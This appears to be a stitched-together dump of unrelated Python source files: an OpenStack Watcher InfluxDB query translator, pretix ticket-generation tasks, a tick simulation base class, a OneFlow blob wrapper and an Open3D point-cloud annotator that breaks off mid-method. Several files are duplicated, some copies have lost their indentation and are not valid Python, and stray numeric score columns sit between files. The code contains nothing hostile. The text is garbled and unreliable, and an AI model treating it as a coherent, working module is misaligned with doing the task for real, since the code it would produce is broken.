        super(InfluxDBGrafanaTranslator, self).__init__(data)
    def build_params(self):
        """Build the HTTP parameters for a Grafana InfluxDB proxy query.

        Picks the shortest configured retention period that covers the
        requested period, resolves the resource attribute and assembles
        the final InfluxDB query string.
        """
        data = self._data
        retention_period = None
        available_periods = CONF.grafana_translators.retention_periods.items()
        # Iterate periods from shortest to longest duration; take the first
        # one long enough for the requested period.
        for key, value in sorted(available_periods, key=lambda x: x[1]):
            if int(data['period']) < int(value):
                retention_period = key
                break
        if retention_period is None:
            # NOTE(review): max() over (name, seconds) items compares by
            # name lexicographically, not by duration, so this may not pick
            # the longest period as the warning implies — confirm intent.
            retention_period = max(available_periods)[0]
            LOG.warning("Longest retention period is to short for desired"
                        " period")
        try:
            resource = self._extract_attribute(
                data['resource'], data['attribute'])
        except AttributeError:
            LOG.error("Resource: {0} does not contain attribute {1}".format(
                data['resource'], data['attribute']))
            raise
        # Granularity is optional if it is None the minimal value for InfluxDB
        # will be 1
        granularity = \
            data['granularity'] if data['granularity'] is not None else 1
        return {'db': data['db'],
                'epoch': 'ms',
                'q': self._query_format(
                    data['query'], data['aggregate'], resource, data['period'],
                    granularity, retention_period)}
def extract_result(self, raw_results):
""""""
try:
# For result structure see:
# https://docs.openstack.org/watcher/latest/datasources/grafana.html#InfluxDB
result = jsonutils.loads(raw_results)
result = result['results'][0]['series'][0]
index_aggregate = result['columns'].index(self._data['aggregate'])
return result['values'][0][index_aggregate]
except KeyError:
LOG.error("Could not extract {0} for the resource: {1}".format(
self._data['metric'], self._data['resource']))
raise exception.NoSuchMetricForHost(
metric=self._data['metric'], host=self._data['resource']) | 0.503418 | 0.252908 |
import logging
import os
from django.core.files.base import ContentFile
from django.utils.timezone import now
from django.utils.translation import gettext as _
from django_scopes import scopes_disabled
from pretix.base.i18n import language
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,
OrderPosition,
)
from pretix.base.services.tasks import EventTask, ProfiledTask
from pretix.base.settings import PERSON_NAME_SCHEMES
from pretix.base.signals import allow_ticket_download, register_ticket_outputs
from pretix.celery_app import app
from pretix.helpers.database import rolledback_transaction
logger = logging.getLogger(__name__)
def generate_orderposition(order_position: int, provider: str):
    """Render and cache the ticket file for a single order position.

    Looks up the ticket output plugin matching *provider*, generates the
    ticket in the order's locale and replaces any previously cached file.
    Returns the pk of the new CachedTicket, or None when no registered
    output matches *provider*.
    """
    order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)
    with language(order_position.order.locale, order_position.order.event.settings.region):
        responses = register_ticket_outputs.send(order_position.order.event)
        for receiver, response in responses:
            prov = response(order_position.order.event)
            if prov.identifier == provider:
                filename, ttype, data = prov.generate(order_position)
                path, ext = os.path.splitext(filename)
                # Drop stale cache entries for this provider before saving.
                for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):
                    ct.delete()
                ct = CachedTicket.objects.create(order_position=order_position, provider=provider,
                                                 extension=ext, type=ttype, file=None)
                ct.file.save(filename, ContentFile(data))
                return ct.pk
def generate_order(order: int, provider: str):
    """Render and cache the combined ticket file for a whole order.

    Providers returning 'text/uri-list' are skipped. Returns the pk of the
    new CachedCombinedTicket, or None when no matching provider produced a
    file.
    """
    order = Order.objects.select_related('event').get(id=order)
    with language(order.locale, order.event.settings.region):
        responses = register_ticket_outputs.send(order.event)
        for receiver, response in responses:
            prov = response(order.event)
            if prov.identifier == provider:
                filename, ttype, data = prov.generate_order(order)
                if ttype == 'text/uri-list':
                    continue
                path, ext = os.path.splitext(filename)
                # Drop stale cache entries for this provider before saving.
                for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):
                    ct.delete()
                ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,
                                                         type=ttype, file=None)
                ct.file.save(filename, ContentFile(data))
                return ct.pk
@app.task(base=ProfiledTask)
def generate(model: str, pk: int, provider: str):
    """Celery entry point: generate a ticket for an order or a position.

    *model* selects the generator ('order' or 'orderposition'); scopes are
    disabled because the task runs outside a request cycle.
    """
    with scopes_disabled():
        if model == 'order':
            return generate_order(pk, provider)
        elif model == 'orderposition':
            return generate_orderposition(pk, provider)
class DummyRollbackException(Exception):
    # NOTE(review): not raised in this module — presumably used elsewhere
    # to abort a transaction and force a rollback; confirm before removing.
    pass
def preview(event: int, provider: str):
    """Render a sample ticket for *event* using the given output provider.

    Creates throwaway sample items, an order with three positions and an
    invoice address inside a transaction that is always rolled back, then
    asks the matching provider to generate a ticket for the first position.
    Returns None when no provider matches.
    """
    event = Event.objects.get(id=event)
    with rolledback_transaction(), language(event.settings.locale, event.settings.region):
        item = event.items.create(name=_("Sample product"), default_price=42.23,
                                  description=_("Sample product description"))
        item2 = event.items.create(name=_("Sample workshop"), default_price=23.40)
        from pretix.base.models import Order
        order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),
                                    email='<EMAIL>',
                                    locale=event.settings.locale,
                                    expires=now(), code="PREVIEW1234", total=119)
        # Build attendee name parts matching the event's name scheme.
        scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]
        sample = {k: str(v) for k, v in scheme['sample'].items()}
        p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)
        s = event.subevents.first()
        order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
        order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
        InvoiceAddress.objects.create(order=order, name_parts=sample, company=_("Sample company"))
        responses = register_ticket_outputs.send(event)
        for receiver, response in responses:
            prov = response(event)
            if prov.identifier == provider:
                return prov.generate(p)
def get_tickets_for_order(order, base_position=None):
    """Return the list of (filename, cached ticket) tuples for *order*.

    Honours the allow_ticket_download signal and the order's download
    window; missing ticket files are generated and cached on the fly.
    When *base_position* is given, only that position and its add-ons are
    considered.
    """
    can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])
    if not can_download:
        return []
    if not order.ticket_download_available:
        return []
    providers = [
        response(order.event)
        for receiver, response
        in register_ticket_outputs.send(order.event)
    ]
    tickets = []
    positions = list(order.positions_with_tickets)
    if base_position:
        # Only the given position and its children
        positions = [
            p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk
        ]
    for p in providers:
        if not p.is_enabled:
            continue
        if p.multi_download_enabled and not base_position:
            try:
                if len(positions) == 0:
                    continue
                ct = CachedCombinedTicket.objects.filter(
                    order=order, provider=p.identifier, file__isnull=False
                ).last()
                if not ct or not ct.file:
                    retval = generate_order(order.pk, p.identifier)
                    if not retval:
                        continue
                    ct = CachedCombinedTicket.objects.get(pk=retval)
                tickets.append((
                    "{}-{}-{}{}".format(
                        order.event.slug.upper(), order.code, ct.provider, ct.extension,
                    ),
                    ct
                ))
            except Exception:
                # Was a bare ``except:``; never swallow SystemExit or
                # KeyboardInterrupt while generating tickets.
                logger.exception('Failed to generate ticket.')
        else:
            for pos in positions:
                try:
                    ct = CachedTicket.objects.filter(
                        order_position=pos, provider=p.identifier, file__isnull=False
                    ).last()
                    if not ct or not ct.file:
                        retval = generate_orderposition(pos.pk, p.identifier)
                        if not retval:
                            continue
                        ct = CachedTicket.objects.get(pk=retval)
                    if ct.type == 'text/uri-list':
                        continue
                    if pos.subevent:
                        # Subevent date in filename improves accessibility e.g. for screen reader users
                        fname = "{}-{}-{}-{}-{}{}".format(
                            order.event.slug.upper(), order.code, pos.positionid,
                            pos.subevent.date_from.strftime('%Y_%m_%d'),
                            ct.provider, ct.extension
                        )
                    else:
                        fname = "{}-{}-{}-{}{}".format(
                            order.event.slug.upper(), order.code, pos.positionid,
                            ct.provider, ct.extension
                        )
                    tickets.append((
                        fname,
                        ct
                    ))
                except Exception:
                    # Was a bare ``except:``; see note above.
                    logger.exception('Failed to generate ticket.')
    return tickets
@app.task(base=EventTask, acks_late=True)
def invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):
    """Delete cached ticket files for *event*, optionally narrowed down.

    The optional filters restrict deletion to a product (*item*), a ticket
    output (*provider*) or a single *order*.
    """
    qs = CachedTicket.objects.filter(order_position__order__event=event)
    qsc = CachedCombinedTicket.objects.filter(order__event=event)
    if item:
        qs = qs.filter(order_position__item_id=item)
    if provider:
        qs = qs.filter(provider=provider)
        qsc = qsc.filter(provider=provider)
    if order:
        qs = qs.filter(order_position__order_id=order)
        qsc = qsc.filter(order_id=order)
    # NOTE(review): per-object delete() presumably triggers file cleanup;
    # confirm before replacing with a bulk queryset delete.
    for ct in qs:
        ct.delete()
    for ct in qsc:
        ct.delete()
import logging
import os
from django.core.files.base import ContentFile
from django.utils.timezone import now
from django.utils.translation import gettext as _
from django_scopes import scopes_disabled
from pretix.base.i18n import language
from pretix.base.models import (
CachedCombinedTicket, CachedTicket, Event, InvoiceAddress, Order,
OrderPosition,
)
from pretix.base.services.tasks import EventTask, ProfiledTask
from pretix.base.settings import PERSON_NAME_SCHEMES
from pretix.base.signals import allow_ticket_download, register_ticket_outputs
from pretix.celery_app import app
from pretix.helpers.database import rolledback_transaction
logger = logging.getLogger(__name__)
def generate_orderposition(order_position: int, provider: str):
    """Generate and cache the ticket for one order position.

    Replaces any previously cached file for the same provider; returns the
    new CachedTicket pk, or None if *provider* matches no registered output.
    """
    order_position = OrderPosition.objects.select_related('order', 'order__event').get(id=order_position)
    with language(order_position.order.locale, order_position.order.event.settings.region):
        responses = register_ticket_outputs.send(order_position.order.event)
        for receiver, response in responses:
            prov = response(order_position.order.event)
            if prov.identifier == provider:
                filename, ttype, data = prov.generate(order_position)
                path, ext = os.path.splitext(filename)
                # Remove stale cache entries before writing the new file.
                for ct in CachedTicket.objects.filter(order_position=order_position, provider=provider):
                    ct.delete()
                ct = CachedTicket.objects.create(order_position=order_position, provider=provider,
                                                 extension=ext, type=ttype, file=None)
                ct.file.save(filename, ContentFile(data))
                return ct.pk
def generate_order(order: int, provider: str):
    """Generate and cache the combined ticket file for a whole order.

    Skips providers whose output type is 'text/uri-list'; returns the new
    CachedCombinedTicket pk, or None when nothing was generated.
    """
    order = Order.objects.select_related('event').get(id=order)
    with language(order.locale, order.event.settings.region):
        responses = register_ticket_outputs.send(order.event)
        for receiver, response in responses:
            prov = response(order.event)
            if prov.identifier == provider:
                filename, ttype, data = prov.generate_order(order)
                if ttype == 'text/uri-list':
                    continue
                path, ext = os.path.splitext(filename)
                # Remove stale cache entries before writing the new file.
                for ct in CachedCombinedTicket.objects.filter(order=order, provider=provider):
                    ct.delete()
                ct = CachedCombinedTicket.objects.create(order=order, provider=provider, extension=ext,
                                                         type=ttype, file=None)
                ct.file.save(filename, ContentFile(data))
                return ct.pk
@app.task(base=ProfiledTask)
def generate(model: str, pk: int, provider: str):
    """Celery task dispatching to the order / order-position generators.

    Runs with scopes disabled since there is no request context here.
    """
    with scopes_disabled():
        if model == 'order':
            return generate_order(pk, provider)
        elif model == 'orderposition':
            return generate_orderposition(pk, provider)
class DummyRollbackException(Exception):
    # NOTE(review): unused in this module — presumably raised elsewhere to
    # force a transaction rollback; confirm before removing.
    pass
def preview(event: int, provider: str):
    """Produce a sample ticket for *event* via the given output provider.

    All sample objects (items, order, positions, invoice address) are
    created inside a transaction that is always rolled back; the matching
    provider renders a ticket for the first sample position.
    """
    event = Event.objects.get(id=event)
    with rolledback_transaction(), language(event.settings.locale, event.settings.region):
        item = event.items.create(name=_("Sample product"), default_price=42.23,
                                  description=_("Sample product description"))
        item2 = event.items.create(name=_("Sample workshop"), default_price=23.40)
        from pretix.base.models import Order
        order = event.orders.create(status=Order.STATUS_PENDING, datetime=now(),
                                    email='<EMAIL>',
                                    locale=event.settings.locale,
                                    expires=now(), code="PREVIEW1234", total=119)
        # Attendee name parts follow the event's configured name scheme.
        scheme = PERSON_NAME_SCHEMES[event.settings.name_scheme]
        sample = {k: str(v) for k, v in scheme['sample'].items()}
        p = order.positions.create(item=item, attendee_name_parts=sample, price=item.default_price)
        s = event.subevents.first()
        order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
        order.positions.create(item=item2, attendee_name_parts=sample, price=item.default_price, addon_to=p, subevent=s)
        InvoiceAddress.objects.create(order=order, name_parts=sample, company=_("Sample company"))
        responses = register_ticket_outputs.send(event)
        for receiver, response in responses:
            prov = response(event)
            if prov.identifier == provider:
                return prov.generate(p)
def get_tickets_for_order(order, base_position=None):
    """Return (filename, cached ticket) tuples for *order*.

    Respects the allow_ticket_download signal and the order's download
    availability; generates any missing cached files on demand. With
    *base_position*, only that position and its add-ons are included.
    """
    can_download = all([r for rr, r in allow_ticket_download.send(order.event, order=order)])
    if not can_download:
        return []
    if not order.ticket_download_available:
        return []
    providers = [
        response(order.event)
        for receiver, response
        in register_ticket_outputs.send(order.event)
    ]
    tickets = []
    positions = list(order.positions_with_tickets)
    if base_position:
        # Only the given position and its children
        positions = [
            p for p in positions if p.pk == base_position.pk or p.addon_to_id == base_position.pk
        ]
    for p in providers:
        if not p.is_enabled:
            continue
        if p.multi_download_enabled and not base_position:
            try:
                if len(positions) == 0:
                    continue
                ct = CachedCombinedTicket.objects.filter(
                    order=order, provider=p.identifier, file__isnull=False
                ).last()
                if not ct or not ct.file:
                    retval = generate_order(order.pk, p.identifier)
                    if not retval:
                        continue
                    ct = CachedCombinedTicket.objects.get(pk=retval)
                tickets.append((
                    "{}-{}-{}{}".format(
                        order.event.slug.upper(), order.code, ct.provider, ct.extension,
                    ),
                    ct
                ))
            except Exception:
                # Was a bare ``except:``; never swallow SystemExit or
                # KeyboardInterrupt while generating tickets.
                logger.exception('Failed to generate ticket.')
        else:
            for pos in positions:
                try:
                    ct = CachedTicket.objects.filter(
                        order_position=pos, provider=p.identifier, file__isnull=False
                    ).last()
                    if not ct or not ct.file:
                        retval = generate_orderposition(pos.pk, p.identifier)
                        if not retval:
                            continue
                        ct = CachedTicket.objects.get(pk=retval)
                    if ct.type == 'text/uri-list':
                        continue
                    if pos.subevent:
                        # Subevent date in filename improves accessibility e.g. for screen reader users
                        fname = "{}-{}-{}-{}-{}{}".format(
                            order.event.slug.upper(), order.code, pos.positionid,
                            pos.subevent.date_from.strftime('%Y_%m_%d'),
                            ct.provider, ct.extension
                        )
                    else:
                        fname = "{}-{}-{}-{}{}".format(
                            order.event.slug.upper(), order.code, pos.positionid,
                            ct.provider, ct.extension
                        )
                    tickets.append((
                        fname,
                        ct
                    ))
                except Exception:
                    # Was a bare ``except:``; see note above.
                    logger.exception('Failed to generate ticket.')
    return tickets
@app.task(base=EventTask, acks_late=True)
def invalidate_cache(event: Event, item: int=None, provider: str=None, order: int=None, **kwargs):
    """Delete cached ticket files for *event*, optionally narrowed down.

    Optional filters restrict the deletion to a product (*item*), a ticket
    output (*provider*) or a single *order*.
    """
    qs = CachedTicket.objects.filter(order_position__order__event=event)
    qsc = CachedCombinedTicket.objects.filter(order__event=event)
    if item:
        qs = qs.filter(order_position__item_id=item)
    if provider:
        qs = qs.filter(provider=provider)
        qsc = qsc.filter(provider=provider)
    if order:
        qs = qs.filter(order_position__order_id=order)
        qsc = qsc.filter(order_id=order)
    # NOTE(review): per-object delete() presumably triggers file cleanup;
    # confirm before replacing with a bulk queryset delete.
    for ct in qs:
        ct.delete()
    for ct in qsc:
        ct.delete()
from abc import ABC, abstractmethod
from time import time
import numpy as np
from tick.base import Base
class Simu(ABC, Base):
    """
    Abstract simulation class. It does nothing besides printing and
    verbosing.
    Parameters
    ----------
    seed : `int`
        The seed of the random number generator
    verbose : `bool`
        If True, print things
    Attributes
    ----------
    time_start : `str`
        Start date of the simulation
    time_elapsed : `int`
        Duration of the simulation, in seconds
    time_end : `str`
        End date of the simulation
    """
    # Timing attributes are read-only for users of Base's attribute
    # machinery; they are updated internally through self._set().
    _attrinfos = {
        "time_start": {
            "writable": False
        },
        "time_elapsed": {
            "writable": False
        },
        "time_end": {
            "writable": False
        },
        "_time_start": {
            "writable": False
        }
    }

    def __init__(self, seed: int = None, verbose: bool = True):
        Base.__init__(self)
        self.seed = seed
        self.verbose = verbose
        # Negative seeds are treated as "do not seed".
        if seed is not None and seed >= 0:
            self._set_seed()
        self._set("time_start", None)
        self._set("time_elapsed", None)
        self._set("time_end", None)
        self._set("_time_start", None)

    def _set_seed(self):
        # Seed numpy's global RNG with the configured seed.
        np.random.seed(self.seed)

    def _start_simulation(self):
        # Record formatted and raw wall-clock start times, then announce.
        self._set("time_start", self._get_now())
        self._set("_time_start", time())
        if self.verbose:
            msg = "Launching simulation using {class_}..." \
                .format(class_=self.name)
            print("-" * len(msg))
            print(msg)

    def _end_simulation(self):
        # Record end time and elapsed seconds, then announce.
        self._set("time_end", self._get_now())
        t = time()
        self._set("time_elapsed", t - self._time_start)
        if self.verbose:
            msg = "Done simulating using {class_} in {time:.2e} " \
                  "seconds." \
                .format(class_=self.name, time=self.time_elapsed)
            print(msg)

    @abstractmethod
    def _simulate(self):
        # Subclasses implement the actual simulation here.
        pass

    def simulate(self):
        """Launch the simulation of data
        """
        self._start_simulation()
        result = self._simulate()
        self._end_simulation()
        return result

    def _as_dict(self):
        dd = Base._as_dict(self)
        # Drop "coeffs" if present; it is excluded from the dict form.
        dd.pop("coeffs", None)
        return dd
from abc import ABC, abstractmethod
from time import time
import numpy as np
from tick.base import Base
class Simu(ABC, Base):
"""
Abstract simulation class. It does nothing besides printing and
verbosing.
Parameters
----------
seed : `int`
The seed of the random number generator
verbose : `bool`
If True, print things
Attributes
----------
time_start : `str`
Start date of the simulation
time_elapsed : `int`
Duration of the simulation, in seconds
time_end : `str`
End date of the simulation
"""
_attrinfos = {
"time_start": {
"writable": False
},
"time_elapsed": {
"writable": False
},
"time_end": {
"writable": False
},
"_time_start": {
"writable": False
}
}
def __init__(self, seed: int = None, verbose: bool = True):
Base.__init__(self)
self.seed = seed
self.verbose = verbose
if seed is not None and seed >= 0:
self._set_seed()
self._set("time_start", None)
self._set("time_elapsed", None)
self._set("time_end", None)
self._set("_time_start", None)
def _set_seed(self):
np.random.seed(self.seed)
def _start_simulation(self):
self._set("time_start", self._get_now())
self._set("_time_start", time())
if self.verbose:
msg = "Launching simulation using {class_}..." \
.format(class_=self.name)
print("-" * len(msg))
print(msg)
def _end_simulation(self):
self._set("time_end", self._get_now())
t = time()
self._set("time_elapsed", t - self._time_start)
if self.verbose:
msg = "Done simulating using {class_} in {time:.2e} " \
"seconds." \
.format(class_=self.name, time=self.time_elapsed)
print(msg)
@abstractmethod
def _simulate(self):
pass
def simulate(self):
"""Launch the simulation of data
"""
self._start_simulation()
result = self._simulate()
self._end_simulation()
return result
def _as_dict(self):
dd = Base._as_dict(self)
dd.pop("coeffs", None)
return dd | 0.848282 | 0.475118 |
from __future__ import absolute_import
import collections
from functools import reduce
import numpy as np
import oneflow as flow
import oneflow_api
from google.protobuf import text_format
from oneflow.python.framework.dtype import convert_proto_dtype_to_oneflow_dtype
from oneflow.python.lib.core.box import Box
class OfBlob(object):
    """Thin Python wrapper around a C++ OfBlob pointer.

    Exposes dtype/shape metadata and numpy copy-in / copy-out helpers
    through the oneflow_api C bindings.
    """

    def __init__(self, of_blob_ptr):
        # Opaque handle owned by the runtime; this wrapper does not free it.
        self.of_blob_ptr_ = of_blob_ptr

    @property
    def dtype(self):
        """OneFlow dtype of the blob."""
        return convert_proto_dtype_to_oneflow_dtype(
            oneflow_api.Ofblob_GetDataType(self.of_blob_ptr_)
        )

    @property
    def static_shape(self):
        """Static (compile-time) shape as a tuple of ints."""
        num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        dst_ndarray = np.ndarray(num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyStaticShapeTo(self.of_blob_ptr_, dst_ndarray)
        return tuple(dst_ndarray.tolist())

    @property
    def shape(self):
        """Current (dynamic) shape as a tuple of ints."""
        num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        dst_ndarray = np.zeros(num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, dst_ndarray)
        return tuple(dst_ndarray.tolist())

    def set_shape(self, shape):
        """Set the blob's dynamic shape; rank must match the blob's."""
        assert isinstance(shape, (list, tuple))
        assert len(shape) == oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        oneflow_api.OfBlob_CopyShapeFrom(
            self.of_blob_ptr_, np.array(shape, dtype=np.int64)
        )

    @property
    def num_axes(self):
        return oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)

    @property
    def is_dynamic(self):
        return oneflow_api.OfBlob_IsDynamic(self.of_blob_ptr_)

    def CopyToNdarray(self):
        """Copy the blob contents into a newly allocated numpy array."""
        return self._CopyToNdarray()

    def CopyFromNdarray(self, src_ndarray):
        """Copy *src_ndarray* into the blob.

        Dynamic blobs adopt the array's shape; static blobs require an
        exact shape match.
        """
        if self.is_dynamic:
            self.set_shape(src_ndarray.shape)
        else:
            shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
            oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
            shape = tuple(shape_tensor.tolist())
            assert src_ndarray.shape == shape
        return self._CopyBodyFromNdarray(src_ndarray)

    def _CopyBodyFromNdarray(self, src_ndarray):
        # Resolve the dtype-specific C copy function by name.
        method_name = oneflow_api.Dtype_GetOfBlobCopyFromBufferFuncName(
            oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
        )
        copy_method = getattr(oneflow_api, method_name)
        copy_method(self.of_blob_ptr_, src_ndarray)

    def _CopyToNdarray(self):
        # Resolve the dtype-specific C copy function by name.
        method_name = oneflow_api.Dtype_GetOfBlobCopyToBufferFuncName(
            oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
        )
        copy_method = getattr(oneflow_api, method_name)
        shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
        shape = tuple(shape_tensor.tolist())
        tensor = np.zeros(
            shape, dtype=flow.convert_oneflow_dtype_to_numpy_dtype(self.dtype)
        )
        copy_method(self.of_blob_ptr_, tensor)
        return tensor
import collections
from functools import reduce
import numpy as np
import oneflow as flow
import oneflow_api
from google.protobuf import text_format
from oneflow.python.framework.dtype import convert_proto_dtype_to_oneflow_dtype
from oneflow.python.lib.core.box import Box
class OfBlob(object):
    """Thin Python wrapper around a C++ OfBlob pointer.

    Exposes dtype/shape metadata and numpy copy-in / copy-out helpers
    through the oneflow_api C bindings.
    """

    def __init__(self, of_blob_ptr):
        # Opaque handle owned by the runtime; this wrapper does not free it.
        self.of_blob_ptr_ = of_blob_ptr

    @property
    def dtype(self):
        """OneFlow dtype of the blob."""
        return convert_proto_dtype_to_oneflow_dtype(
            oneflow_api.Ofblob_GetDataType(self.of_blob_ptr_)
        )

    @property
    def static_shape(self):
        """Static (compile-time) shape as a tuple of ints."""
        num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        dst_ndarray = np.ndarray(num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyStaticShapeTo(self.of_blob_ptr_, dst_ndarray)
        return tuple(dst_ndarray.tolist())

    @property
    def shape(self):
        """Current (dynamic) shape as a tuple of ints."""
        num_axes = oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        dst_ndarray = np.zeros(num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, dst_ndarray)
        return tuple(dst_ndarray.tolist())

    def set_shape(self, shape):
        """Set the blob's dynamic shape; rank must match the blob's."""
        assert isinstance(shape, (list, tuple))
        assert len(shape) == oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)
        oneflow_api.OfBlob_CopyShapeFrom(
            self.of_blob_ptr_, np.array(shape, dtype=np.int64)
        )

    @property
    def num_axes(self):
        return oneflow_api.OfBlob_NumAxes(self.of_blob_ptr_)

    @property
    def is_dynamic(self):
        return oneflow_api.OfBlob_IsDynamic(self.of_blob_ptr_)

    def CopyToNdarray(self):
        """Copy the blob contents into a newly allocated numpy array."""
        return self._CopyToNdarray()

    def CopyFromNdarray(self, src_ndarray):
        """Copy *src_ndarray* into the blob.

        Dynamic blobs adopt the array's shape; static blobs require an
        exact shape match.
        """
        if self.is_dynamic:
            self.set_shape(src_ndarray.shape)
        else:
            shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
            oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
            shape = tuple(shape_tensor.tolist())
            assert src_ndarray.shape == shape
        return self._CopyBodyFromNdarray(src_ndarray)

    def _CopyBodyFromNdarray(self, src_ndarray):
        # Resolve the dtype-specific C copy function by name.
        method_name = oneflow_api.Dtype_GetOfBlobCopyFromBufferFuncName(
            oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
        )
        copy_method = getattr(oneflow_api, method_name)
        copy_method(self.of_blob_ptr_, src_ndarray)

    def _CopyToNdarray(self):
        # Resolve the dtype-specific C copy function by name.
        method_name = oneflow_api.Dtype_GetOfBlobCopyToBufferFuncName(
            oneflow_api.deprecated.GetProtoDtype4OfDtype(self.dtype)
        )
        copy_method = getattr(oneflow_api, method_name)
        shape_tensor = np.zeros(self.num_axes, dtype=np.int64)
        oneflow_api.OfBlob_CopyShapeTo(self.of_blob_ptr_, shape_tensor)
        shape = tuple(shape_tensor.tolist())
        tensor = np.zeros(
            shape, dtype=flow.convert_oneflow_dtype_to_numpy_dtype(self.dtype)
        )
        copy_method(self.of_blob_ptr_, tensor)
        return tensor
import os
import open3d as o3d
import numpy as np
import copy
import json
from math import *
from PyQt5.QtCore import *
from utils.util_func import transform_coordinates_3d, Scaling
from utils.axis_aligner import AxisAligner
from utils.part_segmentator import PartSegmentator
from utils.joint_annotator import JointAnnotator
from utils.animation import AnimationPlayer
from utils.urdf_exporter import URDFExporter
class Annotator():
    """Orchestrates the articulated-object annotation workflow.

    Wires together axis alignment, part segmentation, joint annotation,
    animation preview and URDF export around a single point-cloud model.
    """
    def __init__(self,
                 annotation_material_path,
                 save_path=None):
        # Paths: the model to annotate is chosen later through the GUI.
        self.model_to_be_annotated_path = None
        self.annotation_material_path = annotation_material_path
        # Reference meshes (.obj) available as annotation material.
        self.annotation_material_list = [p for p in os.listdir(self.annotation_material_path) if p.endswith('.obj')]
        self.save_path = save_path
        self.temp_path = None
        # Geometry currently loaded.
        self.model_to_be_annotated = None
        self.annotation_material = None
        # Camera view shared across stages so screenshots stay comparable.
        self.view_param = None
        # 4x4 transforms produced by the alignment / joint stages.
        self.align_transformation = None
        self.joint_transformation = None
        # Screenshots shown in the GUI after each stage.
        self.demo_img_axis_align = None
        self.demo_img_part_segmentation = None
        self.demo_img_joint_annotation = None
        self.annotated_joint_infos = []
        self.material_color = 'color1'
        # Stage-specific annotator helpers.
        self.axis_aligner = AxisAligner()
        self.part_segmentator = PartSegmentator()
        self.joint_annotator = JointAnnotator()
        self.animation_player = AnimationPlayer()
        self.urdf_exporter = URDFExporter()
        self.current_ann_stage = "Axis Align"
    def init_annotator(self):
        """Load the selected model plus any saved transforms, then
        initialise all stage annotators."""
        self.current_material_index = 0
        # Make the model path relative to the current working directory.
        # NOTE(review): assumes the chosen path lives under os.getcwd();
        # confirm against the file-dialog caller.
        self.model_to_be_annotated_path = self.model_to_be_annotated_path.split(os.getcwd().replace('\\', '/'))[1][1:]
        self.model_to_be_annotated_name = self.model_to_be_annotated_path.split('/')[-1].split('_')[0] + '.ply'
        self.model_to_be_annotated = o3d.io.read_point_cloud(os.path.join(self.model_to_be_annotated_path,
                                                                          self.model_to_be_annotated_name))
        self.demo_img_init, self.view_param = self.generate_demo_img()
        # Restore a previously saved axis-alignment transform, if any.
        self.init_align_transformation_path = os.path.join(self.temp_path, 'align_transformation.json')
        if os.path.lexists(self.init_align_transformation_path):
            f = json.load(open(self.init_align_transformation_path))
            self.align_transformation = np.array(f['align_transformation'])
            # self.model_to_be_annotated.transform(self.align_transformation)
        # Restore a previously saved joint transform, if any.
        self.init_joint_transformation_path = os.path.join(self.temp_path, 'joint_transformation.json')
        if os.path.lexists(self.init_joint_transformation_path):
            f = json.load(open(self.init_joint_transformation_path))
            self.joint_transformation = np.array(f['joint_transformation'])
        self.axis_aligner.init_annotator(self.model_to_be_annotated,
                                         init_align_transformation=self.align_transformation)
        self.part_segmentator.init_annotator(self.model_to_be_annotated,
                                             part_mesh_save_path=self.model_to_be_annotated_path)
        self.joint_annotator.init_annotator(self.model_to_be_annotated,
                                            init_joint_transformation=self.joint_transformation)
        # self.reset()
    def update_model(self, id):
        """Switch the reference material from a GUI id '<objname>_<color>'."""
        obj_name, obj_color = id.split('_')
        self.material_color = obj_color
        self.current_material_index = self.annotation_material_list.index(obj_name + '.obj')
        self.reset()
    def reset(self):
        """Reload the selected reference material and reset all stage annotators."""
        self.annotation_material = self.annotation_material_path + '/' + self.annotation_material_list[self.current_material_index]
        self.axis_aligner.reset(self.annotation_material, self.model_to_be_annotated, self.material_color)
        self.part_segmentator.reset(self.model_to_be_annotated)
        self.joint_annotator.reset(self.model_to_be_annotated)
    def set_animation_info(self, parent_file, child_file, lower, upper, joint_type):
        """Store the part meshes and joint limits used by the animation preview."""
        # Paths are made relative to the working directory before loading.
        self.animation_parent_mesh = o3d.io.read_point_cloud(parent_file.split(os.getcwd().replace('\\', '/'))[1][1:])
        self.animation_child_mesh = o3d.io.read_point_cloud(child_file.split(os.getcwd().replace('\\', '/'))[1][1:])
        self.animation_joint_lower = lower
        self.animation_joint_upper = upper
        self.animation_joint_type = joint_type
    def begin_annotation(self, stage):
        """Run one interactive annotation stage and refresh its demo image.

        *stage* is "axis align", "part segmentation" or "joint annotation";
        the shared camera view is threaded through every stage.
        """
        if stage == "axis align":
